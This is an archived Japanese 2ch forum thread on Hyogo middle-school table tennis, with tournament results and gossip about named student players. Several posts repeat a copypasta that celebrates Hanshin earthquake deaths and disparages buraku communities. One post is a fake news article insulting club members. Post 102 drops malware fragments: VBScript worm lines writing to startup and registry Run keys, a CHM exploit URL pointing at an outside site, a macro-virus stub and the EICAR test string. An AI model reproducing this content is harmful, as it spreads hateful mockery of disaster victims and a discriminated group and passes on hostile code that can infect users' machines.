5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

兵庫 中学卓球について

1 :差異:2005/12/18(日) 10:07:08 ID:PZYG/b8g
ぼくは神戸の某中学のものです
兵庫の中学卓球について皆さんどうぞ

2 :差異:2005/12/18(日) 10:11:56 ID:PZYG/b8g
兵庫は二見中や加古川中部中など西が強い!!
神戸では夢野や飛松(実際には地区予選で僕の中学勝ったけど)
などがあります

3 :差異:2005/12/20(火) 16:42:09 ID:2gVbZVYl
sssssssss

4 :名無しQ(・∀・)ノ゜サァン!!:2005/12/20(火) 19:14:58 ID:wBSSKU02
(弱)

5 :名無しQ(・∀・)ノ゜サァン!!:2005/12/21(水) 02:28:44 ID:Qnk0Kgxb
昔、八景中学?が強くなかった?植本さんかっこよかったな☆

6 :名無しQ(・∀・)ノ゜サァン!!:2005/12/21(水) 09:01:48 ID:w+6Odl8u
兵庫(弱)

7 :名無しQ(・∀・)ノ゜サァン!!:2005/12/27(火) 22:21:06 ID:w+xMpwyo
age
今日の新人戦団体の結果は????

8 :・・・・・:2005/12/27(火) 22:37:35 ID:nNeRU5ej
豊富中学校も強い(姫路)

9 :名無しQ(・∀・)ノ゜サァン!!:2005/12/30(金) 00:56:55 ID:lAORskW2
優勝・住吉
2位・伊丹北
3位・吉田
3位・望海
ちなみに夢野は二回戦で伊丹北に負けた。
んでまたさらに、豊富は準々決勝で吉田に負けた。
俺的に見ると前より格段と住吉が強くなってるね。

10 :名無しQ(・∀・)ノ゜サァン!!:2005/12/30(金) 01:31:16 ID:U1p4fE+r
なぜノーマークの望海がここまであがれたのか俺にはわからぬ

11 :名無しQ(・∀・)ノ゜サァン!!:2005/12/30(金) 12:23:13 ID:lAORskW2
まあ、あたり方しだいって事っすよ
仮に望海のブロックに伊丹北、豊富、吉田、住吉、夢野などが
入っていたら望海は負けてたでしょう・・・・

12 :名無しQ(・∀・)ノ゜サァン!!:2005/12/30(金) 16:41:22 ID:4QEFNtS4
シングルとダブルスは?

13 :名無しQ(・∀・)ノ゜サァン!!:2005/12/30(金) 18:13:46 ID:U1p4fE+r
シングル
1位藤本(神出)
2位堀本(揖保川)
3位田中(豊富)
  澤田(夢野)

ダブルス
1位神崎・市川(荒牧)
2位望月・平沙(浜の宮)
3位中迫・山岡(園田東)
  田中・黒代(伊丹北)
 ちなみに大下⇒望月に変わってます

14 :名無しQ(・∀・)ノ゜サァン!!:2005/12/30(金) 18:17:34 ID:U1p4fE+r
連レススマソ
ひとつ気になるのが、望海ってどんなやついたっけ?

15 :名無しQ(・∀・)ノ゜サァン!!:2005/12/30(金) 18:42:55 ID:4QEFNtS4

でもなんで望海が第一シードだったんだろう?
阪神、神戸地区の学校の方が強い様に思うけど。
多分ブロックにパッキンの学校が集まったんだろうね
だから3位まで上がったんだと思う。
でも豊富は吉田に負けたんだな〜シングル3本は
堅いと思ったんだけど。

16 :・・・・・:2005/12/30(金) 18:51:16 ID:Skqcmhjt
堀本強いな・・・・

17 :名無しQ(・∀・)ノ゜サァン!!:2005/12/30(金) 19:13:14 ID:QBXbuHc/
キッズαの田中君って何中?


18 :名無しQ(・∀・)ノ゜サァン!!:2005/12/31(土) 01:41:03 ID:NmFpiBoR
今年は1年の方がつよいかもねぇ〜
2年ガンガレ!!

19 :名無しQ(・∀・)ノ゜サァン!!:2005/12/31(土) 02:02:15 ID:gSLRto27
カワイィコいませんの?紹介してほしぃな☆できたら遊びたい☆

20 :名無しQ(・∀・)ノ゜サァン!!:2006/01/01(日) 08:35:58 ID:W4nM3jEB
重複です
こちらへどうぞ
http://c-au.2ch.net/test/-/pingpong/1129812638/i

21 :名無しQ(・∀・)ノ゜サァン!!:2006/01/01(日) 11:06:16 ID:m/4ywXYV
>>20
四ね

22 :名無しQ(・∀・)ノ゜サァン!!:2006/01/01(日) 12:48:20 ID:DtYf5+SM
17>田中君どこ?中?

23 :名無しQ(・∀・)ノ゜サァン!!:2006/01/03(火) 00:50:00 ID:JT19T0S5
かさたな

24 :名無しQ(・∀・)ノ゜サァン!!:2006/01/22(日) 16:54:43 ID:jSnFw0nd
田中は豊富中学校

25 :名無しQ(・∀・)ノ゜サァン!!:2006/01/28(土) 22:33:22 ID:FOax5eGj
田中強い・・・

26 :名無しQ(・∀・)ノ゜サァン!!:2006/01/29(日) 17:19:45 ID:y9zmkxAh
んで結局、田中(豊富)と澤田(夢野)どっちが強いん?

27 :名無しQ(・∀・)ノ゜サァン!!:2006/01/30(月) 15:39:08 ID:Uzxu3fTa
余裕で田中。

28 :名無しQ(・∀・)ノ゜サァン!!:2006/02/16(木) 14:43:09 ID:MzWG1OVo
ていうか卓球部とかはっとうやつ

29 :名無しQ(・∀・)ノ゜サァン!!:2006/02/16(木) 14:46:01 ID:MzWG1OVo
富山つよすぎ

30 :名無しQ(・∀・)ノ゜サァン!!:2006/02/16(木) 14:48:05 ID:MzWG1OVo
吉田強い


31 :名無しQ(・∀・)ノ゜サァン!!:2006/02/16(木) 14:49:29 ID:MzWG1OVo
吉田は豊富に勝ったらしいよ〜

32 :s・h:2006/02/20(月) 21:25:41 ID:h0SfB83V
でも富山に俺勝ったで

33 :s・h:2006/02/21(火) 15:59:39 ID:dsAIRukQ
豊富の桜井兄より弟のほうがつよいよな!

34 :名無しQ(・∀・)ノ゜サァン!!:2006/02/21(火) 17:26:32 ID:mz/w3Pti
32>は誰なん?マジ教えて!!


35 :名無しQ(・∀・)ノ゜サァン!!:2006/02/22(水) 19:14:53 ID:lCCNu1j+
32>>いつの大会で?

36 :名無しQ(・∀・)ノ゜サァン!!:2006/02/23(木) 19:29:13 ID:h2CVhrfI
33>>確かに俺もそうやと思うけど吉田と豊富の団体で 
桜井弟が吉田のやつに負けとったで。

37 :s・h:2006/02/24(金) 14:01:21 ID:zBRKxvcz
調子わるかったんちゃう?

38 :名無しQ(・∀・)ノ゜サァン!!:2006/04/14(金) 21:13:09 ID:yWUJxDYn


39 :名無しQ(・∀・)ノ゜サァン!!:2006/04/23(日) 16:44:23 ID:pjEz7YRN
age

40 :名無しQ(・∀・)ノ゜サァン!!:2006/04/23(日) 16:47:50 ID:YTjGR1WM
阪神大震災は笑えた!
死者1000人ごとにカウントしてたのってオレだけ?
(よっしゃー2000人突破!よーし次は3000人突破しろーって)
でも結局は6000人しか死んでねえんだよね。全然、騒ぐほどじゃないし。
阪神大震災は笑えた。まじで
ニュースで知って、手を叩いてわらったなぁ。
おまえらが震災にあってる間、家でみかん食ってた
アホだなーこいつらって思いながら
わざわざ神戸まで行って記念撮影しようかと思ったよ。
でも阪神大震災のおかげで何かしらの利益を得た人だっている訳だし
結果的には良かったんじゃないかな。
たしか知事や市長が自衛隊の救援要請を渋っていたけどさ、
あそこらへんって部落が多いからそのまま全滅させたかったんだよね。
今でも仮設住宅に住んでるやつがいるらしいけど、
せこいんだよ!俺らの税金なんだよね。むかつく。
ところで震災直後はあいつらってトイレどうしてたの?
もしかして野グソ?汚ねぇなぁー。
どちらにしろヘリからの映像はまさに温泉町のようで壮観だった!
気持ちの良い夕刻でした


41 :名無しQ(・∀・)ノ゜サァン!!:2006/05/09(火) 22:01:14 ID:qkQ9JfeY
age

42 :名無しQ(・∀・)ノ゜サァン!!:2006/05/09(火) 22:29:54 ID:qkQ9JfeY
age

43 :名無しQ(・∀・)ノ゜サァン!!:2006/07/06(木) 21:21:49 ID:12Y5/sUw
age


44 :名無しQ(・∀・)ノ゜サァン!!:2006/07/11(火) 05:50:38 ID:QgcmVxc2
上月兄弟知らωのか!

45 :名無しQ(・∀・)ノ゜サァン!!:2006/07/11(火) 23:56:43 ID:79oa3OoO
卓球ってどうやったら強なるんーーーー?

46 :名無しQ(・∀・)ノ゜サァン!!:2006/07/12(水) 01:05:50 ID:xiSNDn4m
>>44
兄は右シェーク攻撃、弟は左ペンドライブの双子で現在36歳。
神戸の雲雀ヶ丘中学出身で全中シングルスでは二人揃ってベスト8入り。
中学卒業後は二人とも愛知の桜ヶ丘高校に入学。あの松下兄弟(双子)とは
入れ違いにあたる。当時の桜ヶ丘は全国屈指の強豪で兄は途中で...と
なる。一方、弟は地元兵庫での開催となるインターハイでダブルス優勝を
飾る。
そう言えば、先月の卓球王国の卓球人国記は兵庫であったが、全国優勝の
記録に神戸出身の樋浦(大阪・四天王寺卒)や照井(宮城・秀光中等教育)は
出ていたが、同じ神戸出身の上月は出ていなかった。


47 :名無しQ(・∀・)ノ゜サァン!!:2006/07/12(水) 02:53:44 ID:JF9o3Z6T
>>46隆之の方は高校でおかしくなったらしいが、マジの話だったのか?

48 :名無しQ(・∀・)ノ゜サァン!!:2006/07/13(木) 02:08:07 ID:RxmZskLo
>>47
確かに隆之は...。高一時は二人でダブルスを組んで、インターハイの
出場は逃したが東海大会で三位に入賞している。上月の高一時に桜ヶ丘は
インターハイで団体優勝している中、二人はベンチ入りすら出来ず。


49 :名無しQ(・∀・)ノ゜サァン!!:2006/07/13(木) 03:40:18 ID:Qn279BzY
栄光の軌跡を見ろ!レベルの高さを語るのなら、淡路勢だろ?最近知らんが。




50 :名無しQ(・∀・)ノ゜サァン!!:2006/07/13(木) 11:31:13 ID:mbPHl6K2
こないだの兵庫区大会優勝したん吉田でも夢野でもなかった。
我が後輩が漁夫の利でいただきました

51 :名無しQ(・∀・)ノ゜サァン!!:2006/07/13(木) 16:13:56 ID:h+8iK6rP
>>48さんやっぱり桜ヶ丘は松下兄弟の入れ替えで双子の上月兄弟を話題性も含めとったんやろか?

52 :名無しQ(・∀・)ノ゜サァン!!:2006/07/13(木) 22:40:59 ID:sY/kyzyH
愛知の者ですが
桜丘に入ったらおかしくなるのがよくわかる
テストでクラス10番以内に入らないと練習できないし
進学も勝手に決められる
食事抜きもあるらしい・・・
耐えれなくなって逃げるヤツもいる
マジでかわいそう・・・・

53 :名無しQ(・∀・)ノ゜サァン!!:2006/07/14(金) 00:15:39 ID:z1iasULG
>>51
話題性は否定できないね。桜ヶ丘は上月兄弟の次年度にも双子の中村兄弟を
獲得しているからね。さすがに、あの世代での実力者である松下兄弟を上月
兄弟や中村兄弟が越えることは期待してなかっただろうけど。
失礼だけど、上月兄弟の全中ベスト8はクジ運に恵まれたと言われている。
事実、準々決勝では二人揃って2セットとも10点くらいしか取れない、
いわゆるボロ負けであった。松下双子と上月双子の共通点としては、兄が
卓球(松下は桜ヶ丘、上月は兵庫商業)をしており、その兄に双子は卓球を
教わっている。松下双子は小学校高学年から桜ヶ丘で特別に練習をさせて
もらっていたらしい。
中村兄弟は中学時代に全国で実績を残していないが、桜ヶ丘で選抜の団体
優勝に貢献している。優勝候補筆頭が転校(熊谷商業→埼工大深谷)で出場
していない棚ぼたではあったが。

>>52
上月本人から、そんな話は一切聞いたことないが。

54 :名無しQ(・∀・)ノ゜サァン!!:2006/07/14(金) 04:01:01 ID:uB2dC7bN
中一の終わりの明石近郊で目の中に隆の試合が
飛び込んできた。たしかカットマンとの試合だったと思うのだが、
すごく上手いと思った。第一印象は強いというよりウマイだったね。
同じ学校のやつに、メッチャ上手いやつおるぞって言ったら、そいつも
見た見たギッチョのペンの奴やろ?はあ?何ゆうてんねん、右のシェークやがな
ちゃうちゃう左のペンやがなみたいな会話をしたのを覚えてる。
なんちゅう奴や、えーっと確か・・上月智ってゼッケンに書いてたな・・・
何て??上月?智?いやいや俺が見た奴も上月やったけど隆って書いてたぞ・・
あわててトーナメント表を見る二人・・・なんや双子かいな!!
見たいな感じですわ。ちなみに智の第一印象は隆と違い強いといういんしょうやったな。
二人とも話ししたけどええやつやったな。二人とも気さくで俺は強いお前誰?みたいな
おごりもなかったしね。それからいろんな大会で顔を合わせたりマルトで遭ったときも
おう久しぶりみたいな感じで上月から話してきよったわ。あとジダン・・
違う、余談やが後輩の西田君も礼儀正しいええ子やったし、北野とか他のチームメイトも気さくな
ええ奴ばっかだったな。長文スマソ

55 :名無しQ(・∀・)ノ゜サァン!!:2006/07/15(土) 03:05:41 ID:DlWPJT64
西田は礼儀正しくええ奴だね。中学時代は実力あったけど報われないことが
多かったけどね。西田が中2の時は上月兄弟がいたから全中ベスト8も夢で
ないチームだったが、近畿地区予選敗退の原因となっている。西田が中3の
時は県3強(西田、北井、佐瀬)の一翼だったが、市大会敗退で県大会にさえ
出場できずに全中は夢に終わっている。
しかし、高1から3年間インターハイシングルスに出場し、高2の地元兵庫
インターハイではで県チャンプとして出場している。
 大学では関東学生リーグ1部にも出場し、日本学生選手権のシングルスは
ベスト16にも入っている。


北野は実力最下位クラスだったけど
夢野で卓球店やってるけど頑張ってもらいたいね。


56 :名無しQ(・∀・)ノ゜サァン!!:2006/07/15(土) 23:29:10 ID:8ohvbHbe
西田は滝二か佐瀬はとこやろ?

57 :名無しQ(・∀・)ノ゜サァン!!:2006/07/16(日) 04:58:57 ID:0tVLLh0X
>>55さんはよく知ってますけど、雲雀丘の関係者??

58 :名無しQ(・∀・)ノ゜サァン!!:2006/07/16(日) 11:10:59 ID:uTZzGj78
>>55の文末を訂正。
北野は実力最下位クラスだったけどキャプテンだったような。
西田は夢野で卓球店やってるけど頑張ってもらいたいね。

佐瀬は神戸高専、北井は三原高校だったが途中で...。
俺は雲雀ヶ丘じゃないけど、同じ長田区だったから上月兄弟とも
西田とも対戦したことあるけど、結果は言わずとも。
長田区大会は常に雲雀ヶ丘であるんだけど、あそこは人里離れた
秘境の地だね。



59 :名無しQ(・∀・)ノ゜サァン!!:2006/07/16(日) 23:00:30 ID:yynEU7FR
>>58さんは、それで良く知ってるんだ、納得です(^.^)長田なら丸中に藤本?だったかな上手いカットマンがいたよね。あと西田はカットマンが苦手だったようなキガス。

60 :名無しQ(・∀・)ノ゜サァン!!:2006/07/16(日) 23:32:24 ID:o0SWmCt7
上月の学年の丸中はNO.1が森下?(長田区NO.4)でカットマン、
NO.2が藤本でシェーク攻撃、NO.3が藤井でカットマンでした。
現在でも日本トップクラスの加山は、西田の高校時代のコーチでした。


61 :名無しQ(・∀・)ノ゜サァン!!:2006/07/17(月) 06:12:48 ID:RC4IVjLK
カットマンはやっぱ松崎の増田、東浦の戎と小橋か?ちなみに1コ上の兵庫中の戎は東浦の戎とは元々近所らしいょ。

62 :名無しQ(・∀・)ノ゜サァン!!:2006/07/17(月) 14:43:56 ID:h9TxB3eJ
カットマンと言えば
S43、玉山(兵庫中、全中3位)
S44、戎(兵庫中、全中出場)、池上(玉津中、県ベスト8)
S45、岸本(二見中、県3位)

63 :名無しQ(・∀・)ノ゜サァン!!:2006/07/18(火) 01:24:51 ID:bFmAj54+
岸本は滝2?あいつは二見のワル木原とのコンビでやりたい放題

64 :名無しQ(・∀・)ノ゜サァン!!:2006/07/18(火) 23:48:15 ID:oneob3rf
岸本、木原ともに滝2だよ。
滝2は岸本らが2年の時にインターハイ団体初出場しベスト16ながら、
その大会で優勝した熊谷商業と3−2の熱戦を演じている。この試合は
池上がシングルス(ジュニアチャンプを破る)とダブルス(ペアは岸本)で
2ポイントしている。残りは木原、西田、金城(苅藻中)がシングルスで
敗退している。木原は前の試合で中国大会3冠王に勝利しており、好調
だったと思われる。西田は大舞台での弱さを...。




65 :名無しQ(・∀・)ノ゜サァン!!:2006/07/19(水) 18:17:32 ID:ZUTQcrFl
今の話しないか?

66 :名無しQ(・∀・)ノ゜サァン!!:2006/07/23(日) 02:22:03 ID:DBF8srBT
昔話なら違うとこでやれ!または、新スレ立てろよ(~Q~)

67 :名無しQ(・∀・)ノ゜サァン!!:2006/07/26(水) 21:15:43 ID:NCtYRh+Q
しかも、みんな実名出し過ぎ〜もうちょいえわきまえて。

68 :名無しQ(・∀・)ノ゜サァン!!:2006/07/27(木) 03:15:44 ID:Ll9Q0GoB
まあ叩いてるわけじゃないから、ヨシにしときましょうよ。

69 :名無しQ(・∀・)ノ゜サァン!!:2006/08/04(金) 10:39:10 ID:m4ARPwnE
住吉は一体なにがあったんだ?
吉田までは負けないとおもってたんだが
でもやっぱり去年のほうがレベル高かったな

70 :名無しQ(・∀・)ノ゜サァン!!:2006/08/22(火) 11:12:28 ID:ccGl+A8V
話題になるのやっぱ男ばっかだな!!
女子の話題もしょうぜ!!

71 :名無しQ(・∀・)ノ゜サァン!!:2006/08/28(月) 17:49:52 ID:ZQ5zUPzb
じゃあ何か話題振って

72 :名無しQ(・∀・)ノ゜サァン!!:2006/08/28(月) 20:36:50 ID:PWwbTGuN
阪神大震災は笑えた!
死者1000人ごとにカウントしてたのってオレだけ?
(よっしゃー2000人突破!よーし次は3000人突破しろーって)
でも結局は6000人しか死んでねえんだよね。全然、騒ぐほどじゃないし。
阪神大震災は笑えた。まじで
ニュースで知って、手を叩いてわらったなぁ。
おまえらが震災にあってる間、家でみかん食ってた
アホだなーこいつらって思いながら
わざわざ神戸まで行って記念撮影しようかと思ったよ。
でも阪神大震災のおかげで何かしらの利益を得た人だっている訳だし
結果的には良かったんじゃないかな。
たしか知事や市長が自衛隊の救援要請を渋っていたけどさ、
あそこらへんって部落が多いからそのまま全滅させたかったんだよね。
今でも仮設住宅に住んでるやつがいるらしいけど、
せこいんだよ!俺らの税金なんだよね。むかつく。
ところで震災直後はあいつらってトイレどうしてたの?
もしかして野グソ?汚ねぇなぁー。
どちらにしろヘリからの映像はまさに温泉町のようで壮観だった!
気持ちの良い夕刻でした

阪神大震災は笑えた!
死者1000人ごとにカウントしてたのってオレだけ?
(よっしゃー2000人突破!よーし次は3000人突破しろーって)
でも結局は6000人しか死んでねえんだよね。全然、騒ぐほどじゃないし。
阪神大震災は笑えた。まじで
ニュースで知って、手を叩いてわらったなぁ。
おまえらが震災にあってる間、家でみかん食ってた
アホだなーこいつらって思いながら
わざわざ神戸まで行って記念撮影しようかと思ったよ。
でも阪神大震災のおかげで何かしらの利益を得た人だっている訳だし
結果的には良かったんじゃないかな。
たしか知事や市長が自衛隊の救援要請を渋っていたけどさ、
あそこらへんって部落が多いからそのまま全滅させたかったんだよね。
今でも仮設住宅に住んでるやつがいるらしいけど、
せこいんだよ!俺らの税金なんだよね。むかつく。
ところで震災直後はあいつらってトイレどうしてたの?
もしかして野グソ?汚ねぇなぁー。
どちらにしろヘリからの映像はまさに温泉町のようで壮観だった!
気持ちの良い夕刻でした

阪神大震災は笑えた!
死者1000人ごとにカウントしてたのってオレだけ?
(よっしゃー2000人突破!よーし次は3000人突破しろーって)
でも結局は6000人しか死んでねえんだよね。全然、騒ぐほどじゃないし。
阪神大震災は笑えた。まじで
ニュースで知って、手を叩いてわらったなぁ。
おまえらが震災にあってる間、家でみかん食ってた
アホだなーこいつらって思いながら
わざわざ神戸まで行って記念撮影しようかと思ったよ。
でも阪神大震災のおかげで何かしらの利益を得た人だっている訳だし
結果的には良かったんじゃないかな。
たしか知事や市長が自衛隊の救援要請を渋っていたけどさ、
あそこらへんって部落が多いからそのまま全滅させたかったんだよね。
今でも仮設住宅に住んでるやつがいるらしいけど、
せこいんだよ!俺らの税金なんだよね。むかつく。
ところで震災直後はあいつらってトイレどうしてたの?
もしかして野グソ?汚ねぇなぁー。
どちらにしろヘリからの映像はまさに温泉町のようで壮観だった!
気持ちの良い夕刻でした


73 :名無しQ(・∀・)ノ゜サァン!!:2006/09/01(金) 17:39:52 ID:9TGpN2Nv
>>45さんは練習しまくったら強なるでェ〜(単純)

74 :名無しQ(・∀・)ノ゜サァン!!:2006/09/01(金) 17:44:58 ID:9TGpN2Nv
そういえばのじぎく兵庫国体って中3でも出れるねんよな〜!!

75 :名無しQ(・∀・)ノ゜サァン!!:2006/09/02(土) 12:18:34 ID:bA4BHe1f
 ネット上のマナーやモラルが問題になっている。本紙が中高生のネット事情を追ってみることにした。(教育取材班)

 「人の悪口ばかり書いて楽しいのか」(中2男子)、「同じ高校生とは思えない」(高1女子)、「周りの友達でこんなレベルの低いことをする人はいないのでちょっと信じられない」(高2男子)
…本紙が中学生・高校生にインターネット掲示板「2ちゃんねる」卓球板を閲覧させて感想を聞いてみたら、このような否定的な反応が返ってきた。

 卓球部員だという男子高校生は「卓球部は陰湿な人が多いと感じていたが、自分の周りにこのようなことに手を染めている人がいると思えば気持ち悪い」。

 卓球板の陰湿さは目に余る。○○県の中学生・高校生」「○○県のかわいい子」などの糞スレが乱立し、卓球部員の実名を出しての個人攻撃などが書き連ねられている。
他の板では決して考えられない内容である。こういう糞スレを乱立させること自体が「荒らし」行為であることはいうまでもない。また個人攻撃の話題は、2ちゃんねるのルールにも抵触する可能性がある。
しかし糞スレの乱立に、管理側もお手上げの様子。

 ある中学校教諭は、絶対匿名を条件に本紙の取材に応じてくれた。「どこの学校でも、卓球部には、成績も下の方で、また自分勝手で、人の悪口を言うのが唯一の趣味という、
陰湿な性格の持ち主が集まる傾向がある。正直言って、指導にお手上げ状態」。

 ある精神科医はこう語る。「2ちゃんねる卓球板に変な書き込みを繰り返す者は、こういった変な書き込みを繰り返す性癖を直さないまま成人すると、
犯罪に手を染めたり周囲の人に多大な迷惑をかけたりする可能性も高くなる。中高生のうちに自分の間違った傾向を少しでも自覚し、性格を矯正するようにしていかなければならない」

◆猿山一郎・青梅国際大学教授(スポーツ心理学・体育科教育)の話
 卓球部はもともと、低学力で性格的にも陰湿な人間が集まりやすい傾向にある。すぐ感情的になる・たとえ自分が悪いことをしても
相手が悪いことにして徹底的に攻撃するなどの性癖を持つ人間が集まり、矯正されることなく増幅していくという悪循環。
 卓球の技術以前に、中学生・高校生としての基礎学力を付けさせることや、社会常識やネットモラルの育成が重要な課題になる。

76 :名無しQ(・∀・)ノ゜サァン!!:2006/09/13(水) 08:28:27 ID:MyUt5ty/
荒らすアホがおるな。

77 :ゴット:2006/09/17(日) 08:40:28 ID:v0eQcgw3
最近友が丘上がってきていない?
前神戸市予選見に行ったけど中矢とか浜端らへんが強くない?

78 :名無しQ(・∀・)ノ゜サァン!!:2006/09/17(日) 08:52:25 ID:v0eQcgw3
須磨区予選で言うと友が丘がベスト8を5人が独占。
飛松からは吉波。須磨北からは田中。鷹取からは馬場のみだよ!!

79 :名無しQ(・∀・)ノ゜サァン!!:2006/09/17(日) 18:29:26 ID:wpxOr/ml
須磨区内で強くてもしょうがないでしょ。
カデットで誰が残れたって言うのだい??

80 :名無しQ(・∀・)ノ゜サァン!!:2006/09/19(火) 19:44:29 ID:76wfQZi6
兵庫県大会ベスト16の浜端
兵庫県大会出場。神戸市大会5位の中矢。
兵庫県大会出場。神戸市大会ベスト16の久保。等等

81 :名無しQ(・∀・)ノ゜サァン!!:2006/09/19(火) 21:56:38 ID:jg5TWyee
>80
あんまり強いとは思われへん。
兵庫区の方が強いの揃ってるぜ。例えば夢中の面々
個人2年では夢中の長崎 県カデット5位で全国出場←めっちゃ男前
個人1年では須佐中の高橋 県カデット4位で全国出場←コイツ全用具アンドロなのだ

82 :名無しQ(・∀・)ノ゜サァン!!:2006/09/22(金) 08:02:36 ID:QjaXtGS0
重複
中学卓球総合スレ
http://sports9.2ch.net/test/read.cgi/pingpong/1091160749/

83 :名無しQ(・∀・)ノ゜サァン!!:2006/09/22(金) 12:20:48 ID:7ebR/68/
>82
今後当分全国クラスの選手出そうに無いからこのスレは必要なのだ。

84 :名無しQ(・∀・)ノ゜サァン!!:2006/09/22(金) 20:14:44 ID:GZ7Jgb/4
  だっせーーーーー

85 :名無しQ(・∀・)ノ゜サァン!!:2006/09/23(土) 21:43:38 ID:NqQIHKCi
>>44-64
めっちゃナツカシス
玉山はその後同志社でレギュラーやったね
池上は立命やったけど鳴かず飛ばずで...
増田は関西外大でたまに片鱗をみせていた
以上関西学連に在籍してたオサンの独り言でスマソ

86 :名無しQ(・∀・)ノ゜サァン!!:2006/09/24(日) 01:32:03 ID:wBdP0Usy
その玉山は三兄弟の長兄だな。仮にも中学全国3位、高校県2位だから。
池上は部内で強かったが団体で起用されずにクサってたらしい。立命と
言えば、三田学園出身の芝が活躍してた。今は滝2出身の岩崎と同じ
クラブ。
東洋大姫路の増田ね。兵庫インターハイでは優勝した平に19,19と善戦。
あの頃の東洋は県外から有力選手を集めてた。
杉本:徳島で全中シングル出場、中学では成見、川嶋と同じチームメイト。
成見:龍谷大学では世界3位の王会元とダブルスを組む。
道広:中学では岡山チャンプ、全国ベスト32。駒沢大学ではインカレ3位。
   妹は世界選手権代表。
滝川:中学では岡山3位。
山本:中学では愛媛2位。

87 :名無しQ(・∀・)ノ゜サァン!!:2006/09/24(日) 06:31:01 ID:HFHnx39n
>85.86

過去の話はこっちで頼むわ!
     ↓
http://sports9.2ch.net/test/read.cgi/pingpong/1153406227

88 :名無しQ(・∀・)ノ゜サァン!!:2006/09/24(日) 06:32:12 ID:HFHnx39n
↑アゲてもた・・・スマソ・・

89 :名無しQ(・∀・)ノ゜サァン!!:2006/10/16(月) 22:54:02 ID:YMu3SJhI
淡路勢にどこも勝てない。

90 :名無しQ(・∀・)ノ゜サァン!!:2006/10/20(金) 15:45:46 ID:SCXpW9xI
>>89
過去:淡路勢にどこも勝てない。
現在:淡路勢はどこも勝てない。

91 :名無しQ(・∀・)ノ゜サァン!!:2006/10/27(金) 13:54:00 ID:+g8EMm4h
県で勝つより、淡路で勝つのが難しかった

92 :名無しQ(・∀・)ノ゜サァン!!:2006/10/27(金) 19:10:40 ID:i46tw4kl
淡路で強いやついる?

93 :名無しQ(・∀・)ノ゜サァン!!:2006/10/27(金) 21:36:18 ID:+g8EMm4h
今は居ねえな。

94 :名無しQ(・∀・)ノ゜サァン:2006/11/04(土) 14:50:04 ID:rUwQ9EYq
去年の吉田中みたいにダークホースでてこないかなーー

95 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 12:18:10 ID:6yw9Gqmm
中播で強いとこでてくる・・・・

96 :様尾:2006/11/06(月) 17:46:53 ID:OsCSOMJs
へえーーーーーー

97 :名無しQ(・∀・)ノ゜サァン!!:2006/11/12(日) 15:05:24 ID:U/10uOpu
宝殿は全然ダメだな。
3年くらい前は強かったのに

98 :名無しQ(・∀・)ノ゜サァン!!:2006/11/15(水) 12:26:19 ID:/LbA2xWa
19日の神戸市新人戦誰が優勝しそう?

99 :様尾:2006/11/15(水) 15:20:36 ID:KPncjp/D
今はやっぱり夢野の長崎や本山南の出口とかか?
でも浦や石田もいるな。
しかし須佐のの高橋もどこまでいくか楽しみだな。
団体戦が楽しみだ!!

100 :名無しQ(・∀・)ノ゜サァン!!:2006/11/15(水) 15:23:18 ID:xgqnfS6X
100get

阪神大震災は笑えた!
死者1000人ごとにカウントしてたのってオレだけ?
(よっしゃー2000人突破!よーし次は3000人突破しろーって)
でも結局は6000人しか死んでねえんだよね。全然、騒ぐほどじゃないし。
阪神大震災は笑えた。まじで
ニュースで知って、手を叩いてわらったなぁ。
おまえらが震災にあってる間、家でみかん食ってた
アホだなーこいつらって思いながら
わざわざ神戸まで行って記念撮影しようかと思ったよ。
でも阪神大震災のおかげで何かしらの利益を得た人だっている訳だし
結果的には良かったんじゃないかな。
たしか知事や市長が自衛隊の救援要請を渋っていたけどさ、
あそこらへんって部落が多いからそのまま全滅させたかったんだよね。
今でも仮設住宅に住んでるやつがいるらしいけど、
せこいんだよ!俺らの税金なんだよね。むかつく。
ところで震災直後はあいつらってトイレどうしてたの?
もしかして野グソ?汚ねぇなぁー。
どちらにしろヘリからの映像はまさに温泉町のようで壮観だった!
気持ちの良い夕刻でした


101 :様尾:2006/11/20(月) 17:23:13 ID:4NsXa5ma
神戸市新人戦団体戦の結果ッてどうなった?

102 :名無しQ(・∀・)ノ゜サァン!!:2006/11/20(月) 17:38:13 ID:5TSfctzR
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

103 :名無しQ(・∀・)ノ゜サァン!!:2006/11/20(月) 18:48:50 ID:e+iufJoz
>101
大方の予想通り
優勝 夢野 準優勝 本山南

個人は優勝 浦 準優勝 浦島
3位は長崎 石田
高橋は浦に負けて5位
出口は浦島に負けて県大会出場成らず・・残念
一年生で県大会出場は高橋のみ

104 :名無しQ(・∀・)ノ゜サァン!!:2006/11/23(木) 15:11:32 ID:ZJDbyfeb
出口最近、調子悪いな・・・・

105 :ちゃー:2006/11/24(金) 22:19:05 ID:cKc1fdpD
俺は須磨北の宮本。俺は練習試合で一回だけ、馬場に勝った。
でもやっぱり実際勝てねーや・・・

106 :名無しQ(・∀・)ノ゜サァン!!:2006/11/24(金) 22:40:16 ID:m8xoeahe
馬場って誰??

107 :ちゃー:2006/11/25(土) 11:37:10 ID:+E/cAT0p
中矢って知ってる?友が丘の。そいつの次に強い。馬場は何中か忘れたけど・・・

